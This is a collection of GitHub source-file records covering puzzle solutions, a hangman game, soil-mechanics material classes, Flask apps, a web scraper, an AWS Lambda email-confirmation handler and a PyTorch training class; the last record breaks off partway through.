+{"seq_id":"17333650658","text":"# Warning:\n# The problem statement says Christy gives 1, 2 or 5 chocolates to every\n# colleague except one; that is equivalent to taking 1, 2 or 5 chocolates\n# from a single colleague, which is what this solution does.\n# Otherwise you will get \"Wrong Answer\"\n\ndef oper_per_person(n):\n    ans =0\n    ans += int(n//5)\n    n %= 5\n    ans += int(n//2)\n    n %= 2\n    ans += n\n    return ans\n\n\ndef total_oper(min, minus, arr, n):\n    min_oper = 0\n    for i in range(n):\n        min_oper += oper_per_person(arr[i] - (min-minus))\n    return min_oper\n\n\nif __name__ == '__main__':\n    t = int(input())\n    for x in range(t):\n        n = int(input())\n        emp = list(map(int, input().split()))\n\n        mn = min(emp)\n        ans = total_oper(mn, 0, emp, n)\n\n        for i in range(1, 5):\n            temp = total_oper(mn, i, emp, n)\n            ans = min(ans, temp)\n        print(ans)\n\n","repo_name":"MhmdRyhn/ProblemSolving","sub_path":"Hacker Rank/Equal.py","file_name":"Equal.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"33893992816","text":"import random\nimport hangman_art\nimport hangman_words\n\n#print the logo of this game\nfrom hangman_art import logo, stages\nprint(logo)\n\n#STEP 1\n# create a word list\n# word_list = hangman_words.word_list\n# choose a random word from the word list\nfrom hangman_words import word_list\nchosen_word = random.choice(word_list)\n\n# print(f'chosen_word is {chosen_word}')\n\n#STEP 2\n# create an empty list that is of the same length as the chosen_word\ndisplay = []\nfor letter in chosen_word:\n\tdisplay.append('_')\n\nprint(display)\n\n#set lives equal to 6\nlives = 6\ncorrect_guess = False\nguess_list = []\nwhile '_' in display and lives>0:\n\t# let the user guess a letter. 
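# --- aside: a hedged worked example for Equal.py above ---
# Each operation removes 1, 2 or 5 chocolates from one colleague, so the best
# common target is one of min(emp), min-1, ..., min-4 (going 5 or more below
# the minimum only adds a full extra -5 step for everyone). Reproducing
# oper_per_person as a one-liner and checking one input by hand:
def ops(delta):
    return delta // 5 + delta % 5 // 2 + delta % 5 % 2

emp = [2, 2, 3, 7]
assert sum(ops(v - 2) for v in emp) == 2   # target min=2: deltas 0, 0, 1, 5
assert sum(ops(v - 1) for v in emp) == 5   # target 1 is worse for this input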
Create a list of all the guesses\n\tguess = input('Guess a letter: ').lower()\n\t\n\n\t# check if the guessed letter is in the chosen_word\n\tif guess in chosen_word:\n\t\tif guess in display:\n\t\t\tprint(f'You have already guessed the letter {guess}.')\n\t\t\tprint(stages[lives])\n\t\telse:\n\t\t\tcorrect_guess = True\n\t\t\t# if user guesses a letter that is present in the chosen word then \n\t\t\t# reveal only that letters in the word\n\t\t\tfor num in range(len(chosen_word)):\n\t\t\t\tif chosen_word[num] == guess:\n\t\t\t\t\tdisplay[num] = guess\n\t\t\tprint(f'Letter a is in the word. {lives} lives left.\\n{stages[lives]}')\n\telse:\n\t\tif guess in guess_list:\n\t\t\tprint(f'You have already guessed {guess}. {lives} left.')\n\t\t\tprint(stages[lives])\n\t\telse:\n\t\t\tguess_list.append(guess)\n\t\t\tcorrect_guess = False\n\t\t\tlives -= 1\n\t\t\tprint(f'Letter {guess} is not in the word. You are left with {lives} lives.\\n{stages[lives]}')\n\n\tprint(display)\n\t# print(guess_list)\n\n\t#if no _ are present in the display and the user has guessed \n\t#all the letters then print You win\n\tif '_' not in display and lives>0:\n\t\tprint('You win')\n\t\n\t# if lives are equal to 0 then print sorry you loose\n\tif lives == 0 and '_' in display:\n\t\tprint(f'{stages[0]} \\n Sorry You Loose. The word was {chosen_word}')\n\n","repo_name":"vedavyas31/Python-Projects","sub_path":"hangman/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17306199279","text":"\"\"\"\nQuestion:\nA palindromic number reads the same both ways.\nThe largest palindrome made from the product of two 2-digit numbers is 9009 = 91 × 99.\nFind the largest palindrome made from the product of two 3-digit numbers.\n\"\"\"\nfrom math import floor\n\nstart_pal = 1000000\nstart_int = 999\nstop_int = 100\n\ndef is_palindrome(test_int: int) -> bool:\n int_list = list(str(test_int))\n int_len = len(str(test_int))\n for i in range(floor(int_len/2)):\n if int_list[i] != int_list[int_len-i-1]:\n return False\n print(\"Found palindrome {}\".format(test_int))\n return True\n\n\ndef is_three_digit(test_int: int) -> bool:\n if len(str(test_int)) == 3:\n return True\n\n\nfor i in range(start_pal, 10000, -1):\n if is_palindrome(i):\n for j in range(start_int, stop_int, -1):\n k = i / j\n if k == round(k) and is_three_digit(round(k)):\n print(j, k)\n quit()","repo_name":"geooff/ProjectEulerSolutions","sub_path":"PE_Q4.py","file_name":"PE_Q4.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70912441069","text":"from math import sqrt, sin, exp, tan, pi, cos\n\nfrom AOD.Unit import *\nimport sys\n\n\nclass Material(object):\n \"\"\"Material class, the parent of all used materials\"\"\"\n _rho = 1000. * ureg['kg/m**3'] # private density\n _T = 15 * ureg['degC'] # private temperature\n _rho_func = None # private function for materials where density is a function of temperature\n _depth = 1. 
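# --- aside: a hedged note on PE_Q4.py above ---
# The digit-mirroring loop in is_palindrome is equivalent to comparing the
# string with its reverse, which is shorter and just as clear in Python:
def is_palindrome(n: int) -> bool:
    s = str(n)
    return s == s[::-1]

assert is_palindrome(9009) and not is_palindrome(9010)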
* ureg['m']\n\n def __str__(self):\n return r'Properties at ' + str(self.T.to('degC')) + '\\n' + 'density: ' + str(self.rho)\n\n def __init__(self, rho=None, T=None, rho_func=None):\n \"\"\"Constructor for Materials\"\"\"\n if rho is not None:\n self._rho = rho\n if T is not None:\n self._T = T\n else:\n self.T = 15\n if rho_func is not None:\n self._rho_func = rho_func\n\n @property\n def depth(self):\n return self._depth\n\n @depth.setter\n def depth(self, value):\n self._depth = value\n\n @property\n def T(self):\n \"\"\" Returns the current temperature of model\"\"\"\n return self._T\n\n @T.setter\n def T(self, value):\n \"\"\" Sets the new temperature, in degrees Celsius \"\"\"\n if type(value) is type(ureg['degC']):\n self._T = value\n else:\n self._T = value * ureg['degC']\n\n @property\n def rho(self):\n \"\"\" Gets the density of a material\"\"\"\n return self._rho\n\n @rho.setter\n def rho(self, value):\n \"\"\" Sets the density of a material\"\"\"\n self._rho = value\n\n\nclass Fluid(Material):\n _P = 0. * ureg['Pa'] # private pressure of the fluid\n _mu = 0. * ureg['Pa*s'] # private dynamic viscosity\n _mu_func = None # private dynamic viscosity\n\n def __init__(self, rho=None, rho_func=None, T=None, P=None, mu=None, mu_func=None):\n Material.__init__(self, T=T, rho=rho, rho_func=rho_func)\n if P is not None:\n self._P = P\n if mu is not None:\n self._mu = mu\n if mu_func is not None:\n self._mu_func = mu_func\n\n @property\n def P(self):\n return self._P\n\n @property\n def mu(self):\n \"\"\"Returns dynamic viscosity, when mu function is specified the function \n is applied, otherwise the private variable is returned\"\"\"\n if self._mu_func is not None:\n return self._mu_func(self.T.to('degC').magnitude)\n else:\n return self._mu\n\n @mu.setter\n def mu(self, value):\n \"\"\" Sets the dynamic viscosity\"\"\"\n self._mu = value\n\n @property\n def nu(self):\n \"\"\" returns the kinematic viscosity\"\"\"\n return (self.mu / self.rho).to('m**2/s')\n\n\nclass Air(Fluid):\n _R = 0. * ureg['J/(kg*K)'] # private specific gas constant for dry air\n\n def __init__(self, T=None, P=None, R=None):\n if T is None:\n T = 15. 
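# --- aside: a hedged numeric check of the ideal-gas density used by Air ---
# With the defaults P = 101.325 kPa, R = 287.05 J/(kg K) and T = 15 degC
# (= 288.15 K), rho = P / (R * T) = 101325 / (287.05 * 288.15) ~= 1.225,
# reproducing the standard sea-level value the class stores as a fallback:
import pint
ureg = pint.UnitRegistry()
P = 101.325e3 * ureg['Pa']
R = 287.05 * ureg['J/(kg*K)']
T = ureg.Quantity(15., 'degC').to('K')   # offset units need Quantity, not *
rho = (P / (R * T)).to('kg/m**3')
assert abs(rho.magnitude - 1.225) < 1e-3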
* ureg['degC']\n if P is None:\n P = 101.325e3 * ureg['Pa']\n if R is None:\n self._R = 287.05 * ureg['J/(kg*K)']\n Fluid.__init__(self, rho=1.225 * ureg['kg/m**3'],\n rho_func=lambda p, r, t: p.to_base_units() / (r.to_base_units() * t.to('K')),\n T=T, P=P, mu=1.789e-5 * ureg['Pa*s'])\n self.depth = float('inf') * ureg['m']\n\n @property\n def R(self):\n return self._R\n\n @R.setter\n def R(self, value):\n self._R = value\n\n @property\n def rho(self):\n \"\"\" Returns the density of a air, when the material has a\n rho_function specified, the density is calculated using the ideal gas law, otherwise it is\n taken from the private variable \"\"\"\n if self._rho_func is not None:\n return self._rho_func(self.P, self.R, self.T)\n else:\n return self._rho\n\n\nclass Water(Fluid):\n \"\"\" Water material \"\"\"\n\n def __init__(self, T=None, P=None):\n \"\"\" Constructor of the water class\"\"\"\n if T is not None:\n self._T = T\n self._rho = 999.7 * ureg['kg/m**3']\n # Water density dependency on temperature (validity 5 ratio:\n return list(self._alpha.values())[0]\n for key in self._alpha.items():\n if key[0] > ratio:\n dR = ratio - prev_key\n dAlpha = self._alpha[key[0]] - self._alpha[prev_key]\n return self._alpha[prev_key] + dR * dAlpha / (key[0] - prev_key)\n else:\n prev_key = key[0]\n return self._alpha[prev_key]\n\n def alpha_bulldozer(self, sigma_sb, sigma_cb):\n ratio = sigma_sb / sigma_cb\n alpha = (-0.0262 * ratio ** 3 + 0.223 * ratio ** 2 - 0.6143 * ratio + 0.9509) + 0.1\n return alpha\n\n def gamma(self, layers):\n \"\"\" Submerged soil weight \"\"\"\n return g * (layers['Soil'].rho_ins - layers['Fluid'].rho)\n\n def sigma_h(self, load):\n \"\"\" Max Horizontal total soil stress assuming soil is at rest \"\"\"\n return load * self.k0\n\n @property\n def c(self):\n \"\"\" Gets the soil cohesion \"\"\"\n return self._c\n\n @c.setter\n def c(self, value):\n \"\"\" Sets the soil cohesion \"\"\"\n self._c = value\n\n @property\n def phi(self):\n \"\"\" Gets the soil internal friction angle \"\"\"\n return self._phi\n\n @phi.setter\n def phi(self, value):\n \"\"\" Sets the soil internal friction angle \"\"\"\n self._phi = value.to('rad')\n\n @property\n def k0(self):\n \"\"\" Gets the soil coeff. of lateral earth pressure \"\"\"\n return self._k0\n\n @k0.setter\n def k0(self, value):\n \"\"\" Sets the soil coeff. of lateral earth pressure\"\"\"\n self._k0 = value\n\n @property\n def delta(self):\n \"\"\" Gets the soil external friction angle \"\"\"\n return self._delta\n\n @delta.setter\n def delta(self, value):\n \"\"\" Sets the soil external friction angle \"\"\"\n self._delta = value.to('rad')\n\n @property\n def rho_ins(self):\n \"\"\" Gets the soil In-situ density \"\"\"\n return self._rho_ins\n\n @rho_ins.setter\n def rho_ins(self, value):\n \"\"\" Sets teh soil In-situ density \"\"\"\n self._rho_ins = value.to('kg/m**3')\n\n @property\n def N_q(self):\n \"\"\" Dimensionless constants in the Brinch-Hansen model (verruijt, 2009) \"\"\"\n return (1 + sin(self.phi)) / (1 - sin(self.phi)) * exp(pi * tan(self.phi))\n\n @property\n def N_gamma(self):\n return 2 * (self.N_q - 1) * tan(self.phi)\n\n @property\n def N_c(self):\n if self.phi == 0.:\n return 2 * pi\n else:\n return (self.N_q - 1) * (1 / tan(self.phi)) # TODO check if cot is 1/tan(alpha)\n\n def S_c(self, B, L):\n return 1. + 0.2 * (B / L)\n\n def S_q(self, B, L):\n return 1. + (B / L) * sin(self.phi)\n\n def S_gamma(self, B, L):\n return 1. 
- 0.3 * (B / L)\n\n def i_c(self, p=None, t=None):\n \"\"\" Inclination factor currently not used \"\"\"\n if p is not None and t is not None:\n ic = 1 - (t / (self.c * p * tan(self.phi)))\n return 1.\n\n def i_q(self, p=None, t=None):\n \"\"\" Inclination factor currently not used \"\"\"\n iq = self.i_c(p, t) ** 2\n return 1.\n\n def i_gamma(self, p=None, t=None):\n \"\"\" Inclination factor currently not used \"\"\"\n igamma = self.i_c(p, t) ** 3\n return 1.\n\n def p_allow(self, q, layers, B, L):\n \"\"\" Allowed load according to Brinch Hansen \"\"\"\n return self.i_c() * self.S_c(B, L) * self.c * self.N_c \\\n + self.i_q() * self.S_q(B, L) * q * self.N_q \\\n + self.i_gamma() * self.S_gamma(B, L) * 0.5 * self.gamma(layers) * B * self.N_gamma\n\n\nclass Silt(Soil):\n \"\"\" Predefined type of Soil, namely silt\"\"\"\n\n def __init__(self):\n \"\"\" Constructor \"\"\"\n Soil.__init__(self, rho=2650. * ureg['kg/m**3'], rho_ins=1300. * ureg['kg/m**3'], c=3.e3 * ureg['Pa'],\n phi=0. * ureg['degree'],\n k0=0.54 * ureg['dimensionless'], delta=0. * ureg['degree'])\n\n\nclass Loose_clay(Soil):\n \"\"\" Predefined type of Soil, namely Loose clay\"\"\"\n\n def __init__(self):\n \"\"\" Constructor \"\"\"\n Soil.__init__(self, rho=2650. * ureg['kg/m**3'], rho_ins=1400. * ureg['kg/m**3'], c=5.e3 * ureg['Pa'],\n phi=0. * ureg['degree'],\n k0=0. * ureg['dimensionless'], delta=0. * ureg['degree'])\n\n\nclass Packed_clay(Soil):\n \"\"\" Predefined type of Soil, namely Packed clay\"\"\"\n\n def __init__(self):\n \"\"\" Constructor \"\"\"\n Soil.__init__(self, rho=2650. * ureg['kg/m**3'], rho_ins=1800. * ureg['kg/m**3'], c=10.e3 * ureg['Pa'],\n phi=0. * ureg['degree'],\n k0=1. * ureg['dimensionless'], delta=0. * ureg['degree'])\n\n\nclass River_clay(Soil):\n \"\"\" Predefined type of Soil, namely River clay used during the test with project 64120-R02\"\"\"\n\n def __init__(self):\n \"\"\" Constructor \"\"\"\n Soil.__init__(self, rho=2650. * ureg['kg/m**3'], rho_ins=(1.86 * ureg['kg/l'] + 1.88 * ureg['kg/l']) / 2,\n c=(4.2 * ureg['kPa'] + 3.1 * ureg['kPa']) / 2,\n phi=0. * ureg['degree'],\n k0=1. * ureg['dimensionless'], delta=0. * ureg['degree'])\n\n\nclass Sand(Soil):\n \"\"\" Predefined type of Soil, namely Packed clay\"\"\"\n\n def __init__(self):\n \"\"\" Constructor \"\"\"\n Soil.__init__(self, rho=2650. * ureg['kg/m**3'], rho_ins=2000. * ureg['kg/m**3'], c=0. * ureg['Pa'],\n phi=35. * ureg['degree'],\n k0=0. * ureg['dimensionless'], delta=35. / 3. 
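# --- aside: a hedged numeric check of the Brinch-Hansen factors above ---
# For Sand with phi = 35 degrees the N-factor properties evaluate to the
# familiar textbook values:
from math import sin, tan, exp, pi, radians
phi = radians(35.)
N_q = (1 + sin(phi)) / (1 - sin(phi)) * exp(pi * tan(phi))   # ~33.3
N_gamma = 2 * (N_q - 1) * tan(phi)                           # ~45.2
N_c = (N_q - 1) / tan(phi)                                   # ~46.1
assert round(N_q, 1) == 33.3 and round(N_c, 1) == 46.1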
* ureg['degree'])\n","repo_name":"jellespijker/AODbearingcap","sub_path":"AOD/Material.py","file_name":"Material.py","file_ext":"py","file_size_in_byte":12604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40718428596","text":"# no-stall-GICS — Christopher Liu, Ivan Mijacika, Shyne Choi, Gavin McGinley\n# SoftDev\n# P01 — no-stock-GICS\n# 2022-01-04\n\n\"\"\"\nApp and Routes\n\nHandles Flask routing for the app.\n\"\"\"\n\n\nfrom os import remove, urandom\n\nfrom flask import Flask, render_template, redirect, session, url_for, request\n\nfrom user import (\n create_user,\n authenticate_user,\n get_user_id,\n get_favorites,\n add_favorite,\n remove_favorite,\n)\nfrom styvio import get_stock_sentiment\nfrom mediawiki import get_summary\nfrom yahoofinance import autocomplete, summary_data, price_chart, full_name\n\napp = Flask(__name__)\napp.secret_key = urandom(32)\n\n\n@app.route(\"/\")\ndef index():\n \"\"\"Displays homepage.\"\"\"\n if \"username\" in session:\n username = session[\"username\"]\n favorites = get_favorites(get_user_id(username))\n\n return render_template(\"home.html\", username=username, favorites=favorites)\n return render_template(\"guest.html\")\n\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n \"\"\"Displays registration form and handles form response.\"\"\"\n if \"username\" in session:\n return redirect(url_for(\"index\"))\n\n # GET request: display the form\n if request.method == \"GET\":\n return render_template(\"register.html\")\n\n # POST request: handle the form response and redirect\n username = request.form.get(\"username\", default=\"\")\n password = request.form.get(\"password\", default=\"\")\n password_check = request.form.get(\"password_check\", default=\"\")\n\n errors = create_user(username, password, password_check)\n if errors:\n return render_template(\"register.html\", errors=errors)\n\n # Maybe put a flash message here to confirm everything works\n return redirect(url_for(\"login\")) # should be login\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n \"\"\"Displays login form and handles form response.\"\"\"\n if \"username\" in session:\n return redirect(url_for(\"index\"))\n\n # GET request: display the form\n if request.method == \"GET\":\n return render_template(\"login.html\")\n\n # POST request: handle the form response and redirect\n username = request.form.get(\"username\", default=\"\")\n password = request.form.get(\"password\", default=\"\")\n\n if authenticate_user(username, password):\n session[\"username\"] = username\n return redirect(url_for(\"index\"))\n\n return render_template(\"login.html\", error=\"incorrect\")\n\n\n@app.route(\"/logout\")\ndef logout():\n \"\"\"Logs out the current user.\"\"\"\n\n if \"username\" in session:\n del session[\"username\"]\n return redirect(url_for(\"index\"))\n\n\n@app.route(\"/search\")\ndef search():\n \"\"\"Displays a search result page containing possible autocomplete stock\n ticker symbols based on the search query.\"\"\"\n\n if \"searchquery\" not in request.args or request.args.get(\"searchquery\") == \"\":\n return redirect(url_for(\"index\"))\n\n search_query = request.args.get(\"searchquery\")\n autocomplete_results = autocomplete(search_query)\n\n favorites = None\n if \"username\" in session:\n favorites = get_favorites(get_user_id(session[\"username\"]))\n\n return render_template(\n \"search.html\",\n search_query=search_query,\n 
autocomplete_results=autocomplete_results,\n favorites=favorites,\n )\n\n\n@app.route(\"/stock/\")\ndef stock(ticker):\n \"\"\"Displays detailed information about the stock associated with the given\n ticker symbol.\"\"\"\n\n favorites = None\n is_favorite = False\n if \"username\" in session:\n favorites = get_favorites(get_user_id(session[\"username\"]))\n if ticker in favorites:\n is_favorite = True\n\n key_stats = summary_data(ticker)\n if key_stats is None:\n return render_template(\"not_found.html\", ticker=ticker, favorites=favorites)\n\n if key_stats:\n current_price = key_stats.pop(\"current_price\")\n else:\n current_price = \"N/A\"\n\n sentiment = get_stock_sentiment(ticker)\n if sentiment:\n logo_url = sentiment[\"logo\"]\n rating = sentiment[\"rating\"]\n recommendation = \"SELL\" if rating == \"Bullish\" else \"BUY\"\n else:\n logo_url = \"\"\n recommendation = \"N/A\"\n\n name = full_name(ticker)\n\n chart = price_chart(ticker)\n\n wiki_summary = get_summary(name)\n summary = wiki_summary[\"summary\"]\n wiki_link = wiki_summary[\"id\"]\n\n return render_template(\n \"stock.html\",\n name=name,\n ticker=ticker,\n logo_url=logo_url,\n current_price=current_price,\n recommendation=recommendation,\n key_stats=key_stats,\n summary=summary,\n wiki_link=wiki_link,\n chart=chart,\n favorites=favorites,\n is_favorite=is_favorite,\n )\n\n\n@app.route(\"/favorite/\")\ndef favorite(ticker):\n \"\"\"Favorites the given ticker if the user is logged in, redirects to\n login page if not.\"\"\"\n if \"username\" not in session:\n return redirect(url_for(\"login\"))\n\n add_favorite(get_user_id(session[\"username\"]), ticker)\n return redirect(url_for(\"stock\", ticker=ticker))\n\n\n@app.route(\"/unfavorite/\")\ndef unfavorite(ticker):\n \"\"\"Unfavorites the given ticker.\"\"\"\n if \"username\" not in session:\n return redirect(url_for(\"stock\", ticker=ticker))\n\n remove_favorite(get_user_id(session[\"username\"]), ticker)\n return redirect(url_for(\"stock\", ticker=ticker))\n\n\nif __name__ == \"__main__\":\n app.debug = True\n app.run()\n","repo_name":"qiqimonkey4300/P01","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5445,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12908770132","text":"from flask import Blueprint, request, jsonify, make_response\n\nfrom database_setup import Employee\nfrom main.repository import employee_repository\n\nmod_employee = Blueprint('employee', __name__, url_prefix='/employee')\n\n\n@mod_employee.route(\"/\", methods=[\"PUT\"])\ndef create_employee():\n employee = Employee(project_id=request.get_json().get('project_id'),\n name=request.get_json().get('name'),\n title=request.get_json().get('title'),\n phone=request.get_json().get('phone'),\n seat=request.get_json().get('seat'))\n employee_repository.create_employee(employee)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\n@mod_employee.route(\"/\", methods=[\"GET\"])\ndef get_employee_by_employee_id(employee_id):\n selected_employee = employee_repository.get_employee_from_employee_id(employee_id)\n return make_response(\n jsonify({'employee_id': selected_employee.id, 'project_id': selected_employee.project_id,\n 'name': selected_employee.name, 'title': selected_employee.title,\n 'phone': selected_employee.phone, 'seat': selected_employee.seat}), 200)\n\n\n@mod_employee.route(\"/\", methods=[\"POST\"])\ndef edit_employee():\n employee = 
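# --- aside: a hedged sketch; the app wiring is not shown in this dump ---
# The employee blueprint above can be exercised with Flask's built-in test
# client, assuming the repository layer is pointed at a test database:
from flask import Flask
app = Flask(__name__)
app.register_blueprint(mod_employee)
client = app.test_client()
resp = client.put("/employee/", json={"project_id": 1, "name": "Ada",
                                      "title": "Engineer", "phone": "555",
                                      "seat": "A1"})
assert resp.status_code == 200 and resp.get_json() == {"success": True}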
Employee(id=request.get_json().get('id'),\n project_id=request.get_json().get('project_id'),\n name=request.get_json().get('name'),\n title=request.get_json().get('title'),\n phone=request.get_json().get('phone'),\n seat=request.get_json().get('seat'))\n\n edited_employee = employee_repository.edit_employee(employee)\n return make_response(\n jsonify({'id': edited_employee.id, 'project_id': edited_employee.project_id,\n 'name': edited_employee.name, 'title': edited_employee.title,\n 'phone': edited_employee.phone, 'seat': edited_employee.seat}), 200)\n\n\n@mod_employee.route(\"/\", methods=[\"GET\"])\ndef get_all_employee_list():\n employee_list_resp = employee_repository.get_all_employee_list()\n return make_response(jsonify(employee_list_resp), 200)\n\n\n@mod_employee.route(\"/\", methods=[\"DELETE\"])\ndef delete_employee_by_employee_id(employee_id):\n employee_repository.delete_employee_by_employee_id(employee_id)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n","repo_name":"1212091/python-learning","sub_path":"basic_web/main/controller/employee_controller.py","file_name":"employee_controller.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25840767593","text":"import csv\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\n\n\nexample_url = \"https://en.wikipedia.org/wiki/Comparison_of_programming_languages\"\n\n\nurl = example_url\n\ndef scrape_for_data(url):\n html = urlopen(url)\n soup = BeautifulSoup(html, \"html.parser\")\n table = soup.findAll(\"table\", {\"class\": \"wikitable\"})[0]\n rows = table.findAll(\"tr\")\n with open(\"data.csv\", \"wt+\", newline=\"\") as f:\n writer = csv.writer(f)\n for row in rows:\n csv_row = []\n for cell in row.findAll([\"td\", \"th\"]):\n csv_row.append(cell.get_text())\n writer.writerow(csv_row)\n x = pd.read_csv(\"data.csv\")\n x.head()\n\n# scrape_for_data(url)\n","repo_name":"harric07/tinda","sub_path":"tinda/extras/web_scraping _for_dataset.py","file_name":"web_scraping _for_dataset.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41300813756","text":"from cmath import inf\nimport os\nimport json\nimport logging\nfrom http import HTTPStatus\nimport os\nimport boto3\nfrom dataclasses import dataclass\nimport re\nfrom utils import *\nfrom error_messages import *\nfrom response import *\nfrom config import *\nfrom custom_mail import *\nfrom datetime import datetime\n\nUSERPOOLID = os.environ['COGNITO_USER_POOL']\nCLIENTPOOLID = os.environ['COGNITO_CLIENT_ID']\nIDENTITY_POOL = os.environ['IDENTITY_POOL']\ncog_provider_client = boto3.client('cognito-idp')\ncog_identity_client = boto3.client('cognito-identity')\n\n\n@error_response\ndef lambda_handler(event, context):\n try:\n body = json.loads(event['body'])\n username = body['username']\n confirmCode = body['confirm_code']\n except Exception as e:\n print(\"error \", e)\n return generate_response(\n message=MessageUnmarshalInputJson,\n data={},\n headers=RESPONSE_HEADER\n )\n try:\n DeleteConfirmCode({\n 'region': REGION,\n 'user': username,\n 'code': confirmCode,\n 'confirm_code_Table': os.environ['TABLE_CONFIRM_CODE']\n })\n except Exception as e:\n raise Exception(e)\n _ = cog_provider_client.admin_confirm_sign_up(\n UserPoolId=USERPOOLID,\n Username=username\n )\n\n _ = 
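# --- aside: a hedged alternative to the scraper above, not part of the Lambda handler in progress ---
# scrape_for_data writes a CSV only to read it straight back; pandas can parse
# the wikitable in one step (requires lxml; the table index may need adjusting
# if the page layout changes):
import pandas as pd
url = "https://en.wikipedia.org/wiki/Comparison_of_programming_languages"
df = pd.read_html(url)[0]   # first <table> element on the page
print(df.head())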
cog_provider_client.admin_update_user_attributes(\n UserPoolId=USERPOOLID,\n Username=username,\n UserAttributes=[\n {\n 'Name': 'email_verified',\n 'Value': 'true'\n },\n ])\n return generate_response(message=\"Email successfully confirmed\", data={},\n headers=RESPONSE_HEADER\n )\n","repo_name":"daita-technologies/backend","sub_path":"daita-app/core-service/functions/handlers/auth_service/auth_confirm/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"8636983038","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport time\nimport os\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nfrom utils.loader import get_loader\nimport opt\nfrom models.lossFun import FocalLoss\nimport utils.metrics as metrics\nimport pytorch_warmup as warmup\n\n\n\nclass Trainer():\n def __init__(self, model):\n self.save_dir = opt.save_dir\n self.data_dir = opt.data_dir\n self.batch_size = opt.batch_size\n self.number_workers= opt.number_workers\n self.time_tri= opt.time_tri\n self.useGAN= opt.useGAN\n self.device = opt.device\n self.model_name=opt.NAME\n self.accumulation_step=opt.accumulation_step\n self.max_epoch=opt.epochs\n self.filename=opt.filename\n\n os.makedirs(self.save_dir, exist_ok=True)\n self.train_loader, self.valid_loader, self.test_loader,_ = get_loader(self.data_dir,self.time_tri,self.batch_size,num_workers=self.number_workers)\n\n self.num_train = self.train_loader.dataset.tensors[0].size(0)\n self.num_valid = self.valid_loader.dataset.tensors[0].size(0)\n self.num_test = self.test_loader.dataset.tensors[0].size(0)\n\n print('Find %d train numbers, %d validation numbers, %d test numbers' %(self.num_train, self.num_valid,self.num_test))\n print('batch size %d' %(self.batch_size))\n\n self.model = model.to(self.device)\n\n if opt.optimizer == 'sgd':\n self.optimizer = torch.optim.SGD(self.model.parameters(),lr=opt.LEARNING_RATE,momentum=0.9)\n elif opt.optimizer == 'adam':\n self.optimizer = torch.optim.Adam(\n self.model.parameters(),\n lr=opt.LEARNING_RATE,\n weight_decay=opt.WEIGHT_DECAY\n )\n elif opt.optimizer=='adamw':\n self.optimizer=torch.optim.AdamW(self.model.parameters(),lr=opt.LEARNING_RATE,betas=(0.9, 0.999),weight_decay=opt.WEIGHT_DECAY)\n else:\n raise NotImplementedError\n if opt.lrsc==\"warmup\":\n self.lrsc=torch.optim.lr_scheduler.CosineAnnealingLR(self.optimizer, T_max=len(self.train_loader) * self.max_epoch)\n else:\n self.lrsc=torch.optim.lr_scheduler.ReduceLROnPlateau(self.optimizer, mode='min', factor=0.1, patience=3, verbose=True, threshold=0.0001, threshold_mode='rel', cooldown=0, min_lr=0, eps=1e-08)\n if opt.loss==\"Focal\":\n self.loss_fn=FocalLoss(logits=True,alpha=opt.ALPHA,gamma=opt.GAMMA)\n elif opt.loss==\"CE\":\n self.loss_fn=nn.CrossEntropyLoss()\n else:\n raise NotImplementedError\n self.start_epoch = 0\n self.best_loss = 1e10\n self.best_score = -1\n if opt.resume==True:\n if os.path.isfile(opt.resume_path):\n self.resume(opt.resume_path, load_optimizer=True)\n else:\n print(\"Checkpoint not found\")\n\n def resume(self, path, load_optimizer=True):\n print(\"Resuming from {}\".format(path))\n checkpoint = torch.load(path)\n self.start_epoch = checkpoint['epoch'] + 1\n self.best_loss = checkpoint['best_loss']\n self.best_score = checkpoint['best_score']\n self.model.load_state_dict(checkpoint['state_dict'])\n if \"optimizer\" 
in checkpoint.keys() and load_optimizer:\n            print(\"Loading optimizer state dict\")\n            self.optimizer.load_state_dict(checkpoint['optimizer'])\n\n    def save_checkpoint(self, epoch, save_optimizer=True, suffix=\"\"):\n        checkpoint = {\n            \"epoch\": epoch,\n            \"state_dict\": self.model.state_dict(),\n            \"best_loss\": self.best_loss,\n            \"best_score\": self.best_score\n        }\n        if save_optimizer:\n            checkpoint['optimizer'] = self.optimizer.state_dict()\n        save_path = self.save_dir +'weights/'+ self.model_name + \"_\" + suffix + \".pth\"\n        os.makedirs(self.save_dir +'weights/', exist_ok=True)\n        torch.save(checkpoint, save_path)\n        # print(\"Save model checkpoint at {}\".format(save_path))\n\n    def train(self, epoch):\n        # start = time.strftime(\"%H:%M:%S\")\n        # lr = self.optimizer.state_dict()['param_groups'][0]['lr']\n        # print(\"Starting epoch: %d | phase: train | ⏰: %s | Learning rate: %f\" %(epoch, start, lr))\n        self.model.train()\n        self.optimizer.zero_grad()\n        # warmup\n        # num_steps = len(dataloader) * epochs\n        # warmup_scheduler = warmup.UntunedLinearWarmup(optimizer)\n        y_predict=torch.tensor(()).to(self.device)\n        